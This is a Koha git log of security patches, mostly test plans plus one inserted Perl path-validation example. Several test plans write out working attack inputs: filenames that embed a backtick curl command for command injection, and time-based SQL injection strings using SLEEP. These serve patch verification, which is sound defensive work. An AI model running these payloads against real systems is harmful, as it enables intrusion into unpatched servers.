git.koha-community.org Git - koha.git/log
koha.git
2 months ago Bug 37508: Test for errors when returning an aliased password column
David Cook [Wed, 7 Aug 2024 01:15:10 +0000 (01:15 +0000)]
Bug 37508: Test for errors when returning an aliased password column

Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37508: Throw error if password column is detected in SQL report
Aleisha Amohia [Mon, 29 Jul 2024 03:53:06 +0000 (03:53 +0000)]
Bug 37508: Throw error if password column is detected in SQL report

This enhancement prevents SQL queries from being run if they would return a password field from the database table.

To test:

1. Run tests and notice they fail t/db_dependent/Reports/Guided.t

2. Apply patch and restart services

3. Create a public report with an SQL report which would access a password column in a database table
4. Try to run the report. Notice you are met with an error and the results are not shown.
5. Access the JSON URL, you should not get the results and should be shown an error
6. Confirm tests pass t/db_dependent/Reports/Guided.t

Sponsored-by: Reserve Bank of New Zealand
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37370: Return 400 if OpacExportOptions does not contain the passed format
Tomas Cohen Arazi [Tue, 16 Jul 2024 15:43:39 +0000 (12:43 -0300)]
Bug 37370: Return 400 if OpacExportOptions does not contain the passed format

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37466: Add correct filter for sort_by in results.tt
David Cook [Thu, 25 Jul 2024 06:44:37 +0000 (06:44 +0000)]
Bug 37466: Add correct filter for sort_by in results.tt

This patch replaces the $raw filter with the correct uri filter
for the sort_by in results.tt

Test plan:
1. Apply patch
2. Go to /cgi-bin/koha/catalogue/search.pl?count=20&sort_by=popularity_dsc&idx=kw&q=1
3. Click on "Edit this search"
4. Note that the "Popularity (most to least)" Sort by option is selected
5. Go to /cgi-bin/koha/catalogue/search.pl?count=20&sort_by=popularity_dsc&idx=kw&q=24y24ty2498294t9824yt9y23
6. Click on "Edit this search"
7. Note that the "Popularity (most to least)" Sort by option is selected

Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Aleisha Amohia <aleishaamohia@hotmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37464: Validate "type" sent to barcode/svc
David Cook [Thu, 25 Jul 2024 06:56:18 +0000 (06:56 +0000)]
Bug 37464: Validate "type" sent to barcode/svc

This change validates the "type" sent to the barcode/svc. Without this
change, we pass the user input directly to GD::Barcode, which passes
the input into an eval{} block without any validation of its own.

Test plan:
0. Apply the patch
1. koha-plack --reload kohadev
2. Go to http://localhost:8081/cgi-bin/koha/svc/barcode?type=bad&barcode=123456
3. Note that a Code39 barcode is provided for an invalid type
4. Go to http://localhost:8081/cgi-bin/koha/svc/barcode?type=Code39&barcode=123456
5. Note that a Code39 barcode is provided
6. Go to http://localhost:8081/cgi-bin/koha/svc/barcode?type=UPCE&barcode=123456
7. Note that a non-Code39 barcode is provided (presumably UPCE)

Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Aleisha Amohia <aleishaamohia@hotmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37488: Validate paths in datalink.txt/idlink.txt files
David Cook [Fri, 26 Jul 2024 04:01:43 +0000 (04:01 +0000)]
Bug 37488: Validate paths in datalink.txt/idlink.txt files

This change validates the paths in datalink.txt/idlink.txt,
so that only images in the unpacked archive directory are allowed

Test plan:
0. Apply the patch
1. koha-plack --reload kohadev
2. Create a datalink.txt file with the following:
42,selfie.jpg
3. Create a jpeg at selfie.jpg
4. ZIP the datalink.txt and selfie.jpg files
5. Upload to the "Upload patron images" tool
(after enabling the "patronimages" system preference)
6. Note that the image uploads correctly

Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37323: Tidy
David Cook [Fri, 26 Jul 2024 03:27:22 +0000 (03:27 +0000)]
Bug 37323: Tidy

Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37323: Don't allow symlinks in link files in zip and validate filepaths
Chris Cormack [Thu, 18 Jul 2024 23:57:32 +0000 (23:57 +0000)]
Bug 37323: Don't allow symlinks in link files in zip and validate filepaths

Test plan:
0. Apply patch and restart/reload Koha
1. Test that uploading a patron image still works, in single file format and as a zip

Work as suggested

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
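
The kind of check the Bug 37488 and Bug 37323 commit messages above describe (only files inside the unpacked archive directory, no symlinks), as an added example that is not Koha's own code. The helper names, the comma-separated "id,filename" line format taken from the test plan, and the sample files are assumptions constructed for illustration; POSIX path separators are assumed.

```perl
#!/usr/bin/perl
# Added example, not Koha code: validate datalink.txt entries against the
# directory the uploaded ZIP was unpacked into. All names are hypothetical.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical path of $filename when it is a regular, non-symlink
# file located inside $unpack_dir; return undef in every other case.
sub safe_image_path {
    my ( $unpack_dir, $filename ) = @_;
    return unless defined $filename && length $filename;
    return if $filename =~ /\0/;                                # embedded NUL
    return if File::Spec->file_name_is_absolute($filename);    # /etc/... style

    my $base = realpath($unpack_dir);
    return unless defined $base;

    my $candidate = File::Spec->catfile( $base, $filename );
    return if -l $candidate;         # the entry itself is a symlink
    return unless -f $candidate;     # must be an existing regular file

    # Resolve "..", "." and symlinked parent directories, then require the
    # result to sit under the base directory. The trailing "/" stops a
    # sibling such as "<base>-evil" from matching the prefix.
    my $resolved = realpath($candidate);
    return unless defined $resolved;
    return unless index( $resolved, "$base/" ) == 0;
    return $resolved;
}

# Split link-file lines into accepted [id, path] pairs and rejected lines.
sub check_link_file {
    my ( $unpack_dir, @lines ) = @_;
    my ( @accepted, @rejected );
    for my $line (@lines) {
        $line =~ s/\r?\n\z//;
        next unless $line =~ /\S/;
        my ( $id, $filename ) = split /\s*,\s*/, $line, 2;
        my $path = safe_image_path( $unpack_dir, $filename );
        if ( defined $path ) {
            push @accepted, [ $id, $path ];
        }
        else {
            push @rejected, $line;
        }
    }
    return ( \@accepted, \@rejected );
}

# Create a small constructed file for the demonstration.
sub write_file {
    my ($path) = @_;
    open my $fh, '>', $path or die "Cannot write $path: $!";
    print {$fh} "constructed sample data\n";
    close $fh or die "Cannot close $path: $!";
    return $path;
}

# --- Constructed sample layout: one legitimate image, one file outside the
# --- unpacked directory, and a symlink inside pointing at the outside file.
my $root     = tempdir( CLEANUP => 1 );
my $unpacked = File::Spec->catdir( $root, 'unpacked' );
mkdir $unpacked or die "Cannot create $unpacked: $!";
write_file( File::Spec->catfile( $unpacked, 'selfie.jpg' ) );
my $outside = write_file( File::Spec->catfile( $root, 'outside.jpg' ) );
symlink $outside, File::Spec->catfile( $unpacked, 'link.jpg' )
    or warn "symlink not supported here: $!";

# Constructed datalink.txt content; only the first line should be accepted.
my @datalink = (
    "42,selfie.jpg",
    "43,../outside.jpg",
    "44,link.jpg",
    "45,$outside",
    "46,missing.jpg",
    "47",
);

my ( $accepted, $rejected ) = check_link_file( $unpacked, @datalink );
print "accepted: id=$_->[0] path=$_->[1]\n" for @{$accepted};
print "rejected: $_\n" for @{$rejected};
```

The containment test runs on the resolved path rather than on the string from the link file, so a `..` segment or a symlinked parent directory cannot slip past a prefix comparison.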
2 months ago Bug 37323: Escape characters in patron image picture upload
Amit Gupta [Thu, 11 Jul 2024 17:43:06 +0000 (23:13 +0530)]
Bug 37323: Escape characters in patron image picture upload

To Test
1. Create a file name for example: test.zip`curl xxxxtesting.informaticsglobal.com`.zip
   where the domain is one you can watch the logs from.
2. Go to Tools and click on Upload patron images choose option zip file and upload the file.
3. Check /var/log/apache2/access.log and see the curl with the IP
   "xx.xxx.xx.xxx - - [11/Jul/2024:23:10:33 +0530] "GET / HTTP/1.1" 200 267 "-" "curl/7.68.0"
4. Apply the patch
5. Repeat steps 2 and 3 and check no error is coming for the Remote execution error.
6. Test uploading actual zip file and images still works.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37255: Fix handling of "All" values on waiting hold cancellation policy
Emmi Takkinen [Thu, 4 Jul 2024 11:23:31 +0000 (14:23 +0300)]
Bug 37255: Fix handling of "All" values on waiting hold cancellation policy

If one creates a default waiting hold cancellation policy with
patron categories set as "All" and itemtype set as "All", Koha
breaks on 500 error. This happens because we try to match
template policy with "All" values either in category or itemtype
with *, not undef. This patch fixes this.

To test:
1. Create a new default waiting hold cancellation policy and
set both patron category and itemtype as "All".
2. Save policy.
=> Error page for error 500 is displayed.
3. Apply this patch.
4. Reload page.
=> Page is displayed and policy listing displays new policy
as it should.

Sponsored-by: Koha-Suomi Oy
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months ago Bug 37533: fix query in orderreceive.tt
Andreas Jonsson [Wed, 31 Jul 2024 09:06:02 +0000 (09:06 +0000)]
Bug 37533: fix query in orderreceive.tt

The new validation in the REST API will no longer allow
the operator "in".  Consequently, it has to be replaced
with the allowed "-in".

Test plan:

 * Open an invoice and click "Go to receipt page" and
   on any basket click "receive" and make sure the dialog
   box appears.

Signed-off-by: Aleisha Amohia <aleishaamohia@hotmail.com>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Update release notes for 23.05.13 release v23.05.13
Wainui Witika-Park [Sun, 28 Jul 2024 23:50:06 +0000 (11:50 +1200)]
Update release notes for 23.05.13 release

Signed-off-by: Wainui Witika-Park <wainuiwitikapark@catalyst.net.nz>
3 months ago Increment version for 23.05.13 release
wainuiwitikapark [Thu, 25 Jul 2024 05:10:44 +0000 (05:10 +0000)]
Increment version for 23.05.13 release

Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Merge branch '23.05.x' into 23.05.x-security
wainuiwitikapark [Thu, 25 Jul 2024 04:53:25 +0000 (04:53 +0000)]
Merge branch '23.05.x' into 23.05.x-security

3 months ago Bug 37247: [23.05.x] Send Koha::Subscription to template
Fridolin Somers [Wed, 24 Jul 2024 08:21:26 +0000 (10:21 +0200)]
Bug 37247: [23.05.x] Send Koha::Subscription to template

Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37247: [23.05.x] Fix display of "closed"
Jonathan Druart [Fri, 5 Jul 2024 12:47:42 +0000 (14:47 +0200)]
Bug 37247: [23.05.x] Fix display of "closed"

The subscription was not shown as closed after we closed it.
This is because "closed" is not passed to the template.
It seems more reliable to rely on the subscription object (that is passed to both
serials/serials-collection.tt and serials/subscription-detail.tt, the
others are not showing the Reopen/Close buttons)

Also fetch the subscription object after and reopen/close it to display
accurate values.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37247: [23.05.x] Fix subscriptions operation allowed without authentication
Fridolin Somers [Thu, 4 Jul 2024 14:18:17 +0000 (16:18 +0200)]
Bug 37247: [23.05.x] Fix subscriptions operation allowed without authentication

Move close and reopen after get_template_and_user().
Also move Koha::Subscriptions->find(), not a good idea to run DB queries
before authentication.

Test plan :
1) Apply patch
2) Authenticate to staff interface
3) Go to an existing open subscription
4) Open a new browser tab and use it to log-out
5) Go to first tab and click on 'Close'
6) You get login page
7) Authenticate
8) Check subscription is not closed
9) Check you can close and reopen subscription

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37210: Properly escape SQL query parameters by using bind values
Julian Maurice [Tue, 2 Jul 2024 14:32:32 +0000 (16:32 +0200)]
Bug 37210: Properly escape SQL query parameters by using bind values

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37210: Escape single quote in search string in overdue.pl
Hammat Wele [Thu, 27 Jun 2024 14:09:04 +0000 (14:09 +0000)]
Bug 37210: Escape single quote in search string in overdue.pl

To Test:
1. Go to /cgi-bin/koha/circ/overdue.pl
2. In the «Name or card number» field, type «Tommy'and(select(0)from(select(sleep(10)))v)and'»
3. Apply the filter
   ==> It takes 10 seconds, sleep(10) is executed
4. Inspect the page, in «Patron category:» field, put «Tommy'and(select(0)from(select(sleep(10)))v)and'» in the value of one of its options
5. Select the option from the filter and apply the filter
   ==> It takes 10 seconds, sleep(10) is executed
We can inject SQL into the following fields: borname, itemtype, borcat, holdingbranch, homebranch and branch
6. Apply the patch
7. Repeat step 1,2,3
   ==> it doesn't take 10 seconds, the injected sql is not executed
8. Repeat step 5
   ==> it doesn't take 10 seconds, the injected sql is not executed
9. Repeat step 5 with the following fields: itemtype, holdingbranch, homebranch and branch
   ==> it doesn't take 10 seconds, the injected sql is not executed

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Add 400 response definition to all routes
Tomas Cohen Arazi [Mon, 8 Jul 2024 20:21:25 +0000 (17:21 -0300)]
Bug 37018: Add 400 response definition to all routes

This patch adds a test for well defined 400 responses on all verbs and
paths on the API spec.

The tests verify:

* Presence of 400 response definition
* The description must start with 'Bad request' (needs coding guideline)
* If DBIC queries are allowed on the route, then `invalid_query` needs
  to be mentioned in the description.

All routes get fixed to make the tests pass.

To test:
1. Apply this patch
2. Run:
   $ ktd --shell
  k$ yarn api:bundle
  k$ prove xt/api.t
=> SUCCESS: Tests pass!

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Clarify operators
Martin Renvoize [Wed, 10 Jul 2024 08:39:33 +0000 (09:39 +0100)]
Bug 37018: Clarify operators

This patch clarifies the list of operators both in the validate routine
and in the swagger description block where we document this feature for
the end user.

JD amended patch: tidy

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Silence useless warning
Tomas Cohen Arazi [Mon, 8 Jul 2024 20:30:01 +0000 (17:30 -0300)]
Bug 37018: Silence useless warning

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Handle exception in unhandled_exception() helper
Tomas Cohen Arazi [Mon, 8 Jul 2024 19:48:01 +0000 (16:48 -0300)]
Bug 37018: Handle exception in unhandled_exception() helper

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: (follow-up) adding some allowed operators
Hammat Wele [Wed, 3 Jul 2024 13:59:48 +0000 (13:59 +0000)]
Bug 37018: (follow-up) adding some allowed operators

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Use validation in search_rs helper
Martin Renvoize [Wed, 5 Jun 2024 13:20:22 +0000 (14:20 +0100)]
Bug 37018: Use validation in search_rs helper

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Add validation method to Koha::REST::Plugin::Query.pm
Martin Renvoize [Wed, 5 Jun 2024 13:19:54 +0000 (14:19 +0100)]
Bug 37018: Add validation method to Koha::REST::Plugin::Query.pm

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Add Koha::Exceptions::REST
Tomas Cohen Arazi [Mon, 8 Jul 2024 17:34:25 +0000 (14:34 -0300)]
Bug 37018: Add Koha::Exceptions::REST

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Unit tests
Martin Renvoize [Wed, 5 Jun 2024 13:19:06 +0000 (14:19 +0100)]
Bug 37018: Unit tests

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37018: Regression tests
Tomas Cohen Arazi [Sat, 6 Jul 2024 13:32:07 +0000 (10:32 -0300)]
Bug 37018: Regression tests

This patch adds regression tests. With the current codebase, the
malicious query returns a 200. It should be caught and a 400 needs to be
returned.

To test:
1. Apply this patch
2. Run:
   $ ktd --shell
  k$ prove t/db_dependent/api/v1/query.t
=> FAIL: It returns a 200
3. Once the rest of the patches are ready, repeat 2
=> SUCCESS: It returns a 400

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37146: Add tests
Jonathan Druart [Thu, 11 Jul 2024 09:40:35 +0000 (11:40 +0200)]
Bug 37146: Add tests

Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 37146: Prevent path traversal by validating input
David Cook [Fri, 21 Jun 2024 01:45:51 +0000 (01:45 +0000)]
Bug 37146: Prevent path traversal by validating input

This patch validates the plugin_name passed to plugin_launcher.pl
against the base path containing the "value_builder" directory.

Test plan:
0. Apply the patch
1. koha-plack --reload kohadev
2. Go to http://localhost:8081/cgi-bin/koha/cataloguing/addbiblio.pl?biblionumber=29
3. Check that the tag editor for leader still works
4. Go to http://localhost:8081/cgi-bin/koha/cataloguing/additem.pl?biblionumber=29
5. Check that the plugin for "Date acquired" still works

Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 35115: (QA follow-up):
Pedro Amorim [Fri, 10 Nov 2023 15:07:35 +0000 (15:07 +0000)]
Bug 35115: (QA follow-up):

Spelling.
Tidiness.
Removal of leftover warn

Nick's patch fixes the issue as described, and I agree that it is the ideal solution here.
prove t/db_dependent/api/v1/erm_eholdings* passes
prove t/db_dependent/Koha/BackgroundJob/CreateEHoldingsFromBiblios.t passes

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 35115: Move store routine from Resource to Title and update code
Nick Clemens [Wed, 8 Nov 2023 18:36:29 +0000 (18:36 +0000)]
Bug 35115: Move store routine from Resource to Title and update code

These patches move the store routine from Koha::ERM::EHoldings::Resource to Koha::ERM::EHoldings::Title as the code deals exclusively with title fields.

It updates the code to ensure that records are created when a title is not attached to a biblio, and that only the biblio title field is updated when updating an eholdings title.

To test:
 1 - Enable ERMModule sys pref
 2 - Create a new public list, visit:
     /cgi-bin/koha/virtualshelves/shelves.pl
 3 - Click "New list" enter name, set public -> public
 4 - Click "Add items", enter 112\n113\n114 (new line for each), in "Biblio numbers"
 5 - Notice that all added biblios have quite a few MARC fields
 6 - Go to packages, visit:
     /cgi-bin/koha/erm/eholdings/local/packages
 7 - Create a new package, add a name and hit 'Submit'
 8 - Go to titles, visit:
     /cgi-bin/koha/erm/eholdings/local/titles
 9 - Click "import from list"
10 - Pick the package created in 7)
11 - On the row of the list created in 2), click "Import"
12 - Go back to the list, visit:
     /cgi-bin/koha/virtualshelves/shelves.pl?op=view&shelfnumber=1
13 - Notice all the biblios have been stripped of their MARC data, and only title remains.
14 - Go to details page for one of the bibs
15 - Edit -> Replace record via Z39.50
16 - You can search for anything, just make sure to import a mostly full record
17 - Go back to ERM - eHoldings - Local - Titles
18 - Edit the title for the record that was replaced
19 - Save
20 - Go to record details - note the record is gone again
21 - Apply patches
22 - Search the catalog
23 - Check some titles
24 - Add to a new list
25 - repeat 8 - 11 with the new list
26 - View and confirm records are intact
27 - Edit the eholdings title for one of the records, changing the title field
28 - Save and view record details
29 - Confirm record is intact and title updated

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 36816: Remove warning
Jonathan Druart [Wed, 22 May 2024 08:08:30 +0000 (10:08 +0200)]
Bug 36816: Remove warning

Use of uninitialized value in string eq at /kohadevbox/koha/opac/opac-memberentry.pl line 629.

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 98637f17a7e59b2fbf0d8d9331b2508065211913)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months ago Bug 36816: Restore clearing patron attributes - OPAC
Jonathan Druart [Wed, 22 May 2024 08:05:16 +0000 (10:05 +0200)]
Bug 36816: Restore clearing patron attributes - OPAC

1) Add a new patron attribute type, visit:
<staff_url>/cgi-bin/koha/admin/patron-attr-types.pl?op=add_attribute_type
2) Add a code and a description (whatever) - Make it 'Display in OPAC' and 'Editable in OPAC'
3) Access OPAC patron personal details page, visit:
<opac_url>/cgi-bin/koha/opac-memberentry.pl
4) Scroll down and add some info to 'whatever'. Click 'Submit update request'.
5) Visit the INTRA 'update patron requests from opac' page:
<staff_url>/cgi-bin/koha/members/members-update.pl
6) Notice the entry is there. Select 'approve' and click "Submit"
7) Repeat 3)
8) Scroll down and notice the approved value is there. Clear that data and "Submit update request" (as if you're requesting for that data to be removed/cleared)
9) Repeat 5)
10) Notice there's an entry, and it is not empty. Select 'approve' and click "Submit"
11) Repeat 3)
12) Scroll down and notice the request to update (clear) that field did go through, i.e. the data is not there anymore.

Also test self-registration and mandatory attributes

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit f4e999bb9f9a714eedc5bac22dd6902abe288af1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
4 months ago Update release notes for 23.05.12 release v23.05.12
Lucas Gass [Tue, 11 Jun 2024 14:37:49 +0000 (14:37 +0000)]
Update release notes for 23.05.12 release

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Increment version for the 23.05.12 release
Lucas Gass [Fri, 7 Jun 2024 15:40:54 +0000 (15:40 +0000)]
Increment version for the 23.05.12 release

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36520: Sanitize input in opac-sendbasket.pl
Chris Cormack [Mon, 13 May 2024 02:26:13 +0000 (02:26 +0000)]
Bug 36520: Sanitize input in opac-sendbasket.pl

To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+-  to the bib_list parameter
7/ Run the curl and notice it takes a long time to respond; if you want to check, run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice the slowdown no longer occurs
10/ Test in browser and make sure the basket is still sent

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36520: Prevent SQL injection in GetPreparedLetter
Jonathan Druart [Mon, 13 May 2024 12:47:28 +0000 (14:47 +0200)]
Bug 36520: Prevent SQL injection in GetPreparedLetter

Actually in _get_tt_params

The following query will delay the response

SELECT `me`.`biblionumber`, `me`.`frameworkcode`, `me`.`author`, `me`.`title`, `me`.`medium`, `me`.`subtitle`, `me`.`part_number`, `me`.`part_name`, `me`.`unititle`, `me`.`notes`, `me`.`serial`, `me`.`seriestitle`
, `me`.`copyrightdate`, `me`.`timestamp`, `me`.`datecreated`, `me`.`abstract`
  FROM `biblio` `me`
WHERE `biblionumber` = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -'
ORDER BY field( biblionumber, 1 ) AND (
    SELECT 1
      FROM
    SELECT SLEEP( 6 ) x
   ) -- - )

To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+-  to the bib_list parameter
7/ Run the curl and notice it takes a long time to respond; if you want to check, run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice the slowdown no longer occurs
10/ Test in browser and make sure the basket is still sent

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36520: Add tests
Jonathan Druart [Wed, 15 May 2024 09:25:47 +0000 (11:25 +0200)]
Bug 36520: Add tests

Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36818: Escape characters in file names uploaded
Chris Cormack [Wed, 8 May 2024 22:41:43 +0000 (22:41 +0000)]
Bug 36818: Escape characters in file names uploaded

To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
   Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no remote execution occurs
7/ Test uploading actual zip file and images still works

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: (Rmaint follow-up) Fix number of tests
Lucas Gass [Mon, 3 Jun 2024 15:10:06 +0000 (15:10 +0000)]
Bug 36575: (Rmaint follow-up) Fix number of tests

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
